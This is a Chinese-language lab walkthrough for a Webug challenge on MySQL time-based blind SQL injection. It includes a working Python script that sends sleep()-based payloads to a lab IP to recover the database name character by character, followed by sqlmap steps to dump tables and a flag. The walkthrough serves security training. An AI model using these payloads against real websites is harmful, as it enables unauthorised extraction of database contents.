MySQL基于时间注入

    延时注入属于盲注技术的一种，它是一种基于时间差异的注入技术。在某些网站屏蔽一般的MySQL注入时，可以通过这种方法所观察所返回的时间来判断是否存在注入点。当存在符合一些条件的时候，就会执行sleep()函数，延时sleep()函数内的参数秒后返回，通过这个原理可以观察语句执行时间来判断是否存在注入点。

这道题是Webug中的中级进阶第5题。

image.png

按照提示，输入在地址栏里输入?type=看看什么情况:

image.png

百度了之后，参考大佬的，输入地址栏如下：

image.png

出现了这个页面（后面测试了，好像就?type=1也可以出现这个页面），证明应该存在注入点。

查看了下注入的命令，如果手动注入的话，得猜很久，参考了大佬的脚本：

import requests,time
payloads="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789@_.}{,"
#存放跑出的结果
length=0
database=''
table=''
print('开始获取长度')
for l in range(1,21):
    startTime1=time.time()
    url1="http://10.75.13.19/pentest/test/time/?type=1 and  if(length(database())=%d,sleep(3),3)"%(l)
    response1=requests.get(url1)
    if time.time()-startTime1>3:
        length=l;
        print('长度为：'+str(length))

print('开始查询数据库名字')
for d in range(1,length+1):
    for payload in payloads:
        startTime2=time.time()
        url2="http://10.75.13.19/pentest/test/time/?type=1 and  if(substr(database(),'%d',1)='%s',sleep(3),3)"%(d,payload)
        response2=requests.get(url2)#发送请求
        if time.time()-startTime2>3:  #判断是否超过了3秒，从而是否函数sleep(3)
           database+=payload
           print(database)
           break
       
print('数据库名为：'+database)
   

实现的语言为python。payloads的作用是用于匹配字符（应该用于猜解数据库名字的字符）。
url1实现的是猜解出数据库名字的长度。url2实现的是猜解出数据库的名字。跑出的数据库名字为：

image.png

用sqlmap工具对其进去查询表，表中的字段，数值等：

查询表：

image.png

可得出表有：

image.png

接着查询表中字段：

image.png

可以看出有 flag和id字段
再查字段：

image.png

就可以得到最后的flag了。